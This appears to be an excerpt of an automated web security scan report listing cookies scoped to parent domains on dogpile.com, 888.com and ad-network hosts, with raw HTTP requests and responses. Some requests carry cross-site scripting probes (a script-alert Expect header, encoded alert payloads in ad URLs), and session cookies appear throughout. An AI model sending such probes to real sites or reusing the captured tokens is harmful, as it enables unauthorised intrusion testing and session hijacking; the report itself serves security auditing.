Content-Length: 9405
Vary: Accept-Encoding
Cache-Control: private, max-age=86380
Date: Fri, 01 Apr 2011 15:44:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<TITLE>NabiscoWorld.com</TITLE>
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cach
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="dDwxMDI4NDU1MzYxOztsPE1haW5fbmF2MTpNYWluX25hdl9saW5rczE6aWJsb2dpbk9uOz4+" />
...[SNIP]...

6. Cookie scoped to parent domain previous next
There are 122 instances of this issue:

http://www.888.com/favicon.ico
http://www.dogpile.com/
http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1
http://www.dogpile.com/clickserver/_iceUrlFlag=1
http://www.dogpile.com/dogpile/ws/about/
http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/faq/
http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/
http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index
http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7
http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/
http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11
http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
http://a.collective-media.net/adj/ns.androidtapp/general
http://ad.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://bh.contextweb.com/bh/set.aspx
http://cf.addthis.com/red/p.json
http://ib.adnxs.com/ab
http://leadback.advertising.com/adcedge/lb
http://m.adnxs.com/msftcookiehandler
http://pixel.33across.com/ps/
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1
http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F
http://safebrowsing.clients.google.com/safebrowsing/downloads
http://syndication.mmismm.com/tntwo.php
http://tags.bluekai.com/site/2045
http://tags.bluekai.com/site/2731
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.amway.com/favicon.ico
http://www.bbpeoplemeet.com/favicon.ico
http://www.belkin.com/favicon.ico
http://www.jpcycles.com/favicon.ico
http://www.loveandseek.com/favicon.ico
http://www.mercantila-checkout.com/setcookie.js
http://www.progressiveagent.com/favicon.ico
http://www.rambler.ru/favicon.ico
http://www.wpbf.com/favicon.ico

6.1. http://www.888.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.888.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=42exmk55tdj1cneietsdoz45; domain=.888.com; path=/
MainCookie=OSR=486413&RefType=NoReferrer&Srv=NO-01&Lang=en; domain=888.com; expires=Sun, 01-Apr-2012 16:09:33 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.888.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
srv: 2341432
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MainCookie=OSR=486413&RefType=NoReferrer&Srv=NO-01&Lang=en; domain=888.com; expires=Sun, 01-Apr-2012 16:09:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=42exmk55tdj1cneietsdoz45; domain=.888.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21300

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>

<script type="text/javascript">

var sFlag = "";

var sCut = "sr=486413&lang=en&ic=5&mkw=&TestData=%3cxml%3e%3cReferrer%3e%
...[SNIP]...

6.2. http://www.dogpile.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2de9fa38eedf4cf59191c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:48 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/clickcallbackserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:01 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:01 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=4JUfDDVL66gTuUrCiPIdbg%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/clickserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&13=search&14=295&15=internal-nav&40=dXWTs3St9FfdeGdDtrJdnw%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dailydealfetcher.com
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:13 GMT
Connection: Keep-Alive
Content-Length: 1216
Vary: Accept-Encoding, User-Agent

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dailydealfetcher.com">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

6.5. http://www.dogpile.com/dogpile/ws/about/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=136fb87258794bf0868fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:26 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/about/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=bfbe830ac1c64c0a810fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:24 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:24 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=51412009a454492dac79c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:53 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:53 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=ba008f1978f546de8f2dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=ba008f1978f546de8f2dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:31 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.9. http://www.dogpile.com/dogpile/ws/faq/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7a7c2c92e274276a8b4c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:25 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
